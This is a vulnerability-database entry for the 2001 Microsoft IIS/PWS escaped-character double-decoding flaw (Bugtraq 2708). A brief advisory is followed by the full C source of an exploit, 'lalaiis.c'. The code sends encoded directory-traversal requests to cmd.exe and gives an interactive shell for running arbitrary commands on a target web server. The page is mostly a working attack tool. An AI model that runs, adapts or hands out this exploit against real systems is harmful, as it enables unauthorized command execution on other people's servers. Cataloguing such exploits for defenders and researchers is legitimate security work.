Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (4)

🗓️ 15 May 2001 00:00:00Reported by MovAXType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 32 Views

Remote command execution on Microsoft IIS 3.0/4.0/5.0 due to flawed CGI handling.

Code
// source: https://www.securityfocus.com/bid/2708/info
   
Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.
   
When IIS receives a CGI filename request, it automatically performs two actions before completing the request:
   
1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.
   
2. When the security check is completed, IIS decodes CGI parameters.
   
A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.
   
Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.
   
Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.
   
The worm Nimda(and variants) actively exploit this vulnerability.

/*  lalaiis.c
    (or Microsoft IIS/PWS Escaped Characters Decoding Command Execution
        Vulnerability) 
   
   Bugtraq id: 2708 

   It gives you a "shell-like" environment to test your IIS servers
   Coded by MovAX <[email protected]>
   Greetz to: lala, HeH! Magazine staff <http://www.dtmf.com.ar/digitalrebel>
   Fuckz to: Feel free to add your handle to this section.

*/


#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>

void usage(void) 
{
 fprintf(stderr, "\nusage: ./lalaiis website> vulnerable_directory");
 fprintf(stderr, "\nwhere vulnerable_directory can be any 'scriptable' dir (like scripts msadc)");
 fprintf(stderr, "\nex: ./lalaiis www.foo.bar scripts\n");
 exit(-1);
}

int main(int argc, char **argv) 
{
 int i, le_socket, le_connect_error, le_timeout ;
 int timeout=80;
 int port=80;
 char temp[1];
 char host[512]=""; 
 char command[1024]="";
 char request[8192]="GET /";
 struct hostent *he;
 struct sockaddr_in s_addr;

 printf(":: lalaiis.c exploit. Coded by MovAX\n");

 if (argc < 3)
    usage();
    
 strncpy(host, argv[1], sizeof(host));
 
 if(!strcmp(host, "")) 
	{
	 fprintf(stderr, "put a damn server\n");
	 usage();
	}

 printf("\n:: Destination host > %s:%d\n", host, port);


 if((he=gethostbyname(host)) == NULL) 
	{
 	 fprintf(stderr, "put a damn VALID server\n");
	 usage();
	}

for (;;)
{
		  command[0]=0;
		  printf("\nlala_shell> ");
		  if(fgets(command, sizeof(command), stdin) == NULL)
		  	  perror("gets"); 
		  command[strlen(command)-1]='\0';
		  if(!strcmp("logout", command))
		  	  exit(-1);

 	 for(i=0;i<strlen(command);i++) 
		 {if(command[i]==' ')
		  	command[i]='+';
		 }

	 strncpy(request, "GET /", sizeof(request));
         strncat(request, argv[2], sizeof(request) - strlen(request));
         strncat(request, "/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+", sizeof(request) - strlen(request));
 	 strncat(request, command, sizeof(request) - strlen(request));
	 strncat(request, " HTTP/1.1\n", sizeof(request) - strlen(request));
	 strncat(request, "host:" ,sizeof(request) - strlen(request));
	 strncat(request, argv[1], sizeof(request) - strlen(request));	
 	 strncat(request, "\n\n", sizeof(request) - strlen(request));

	 s_addr.sin_family = AF_INET;
 	 s_addr.sin_port = htons(port);
 	 memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, 
 		sizeof(s_addr.sin_addr));	

 	 if((le_socket=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) 
		 {
	 	  perror("socket\n");
	 	  exit(-1);
		 }
 	 alarm(le_timeout);
 	 le_connect_error = connect(le_socket,(struct sockaddr *)&s_addr,sizeof(s_addr));
 	 alarm(0);
	 
 	 if(le_connect_error==-1) 
		 {
	 	  perror("connect");
	 	  exit(-1);
	 	  close(le_socket);
		 }
		 
 	 send(le_socket, request, strlen(request), 0);
 	 while(recv(le_socket,temp,1, 0)>0) 
		 {
         	  alarm(timeout);
	 	  printf("%c", temp[0]);
         	  alarm(0);
		 }	
}
  close(le_socket);	
  return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 May 2001 00:00Current
7.4High risk
Vulners AI Score7.4
iis command execution flawcgi filename requestsecurity check bypasspersonal web server vulnerabilitynimda worm exploit.
32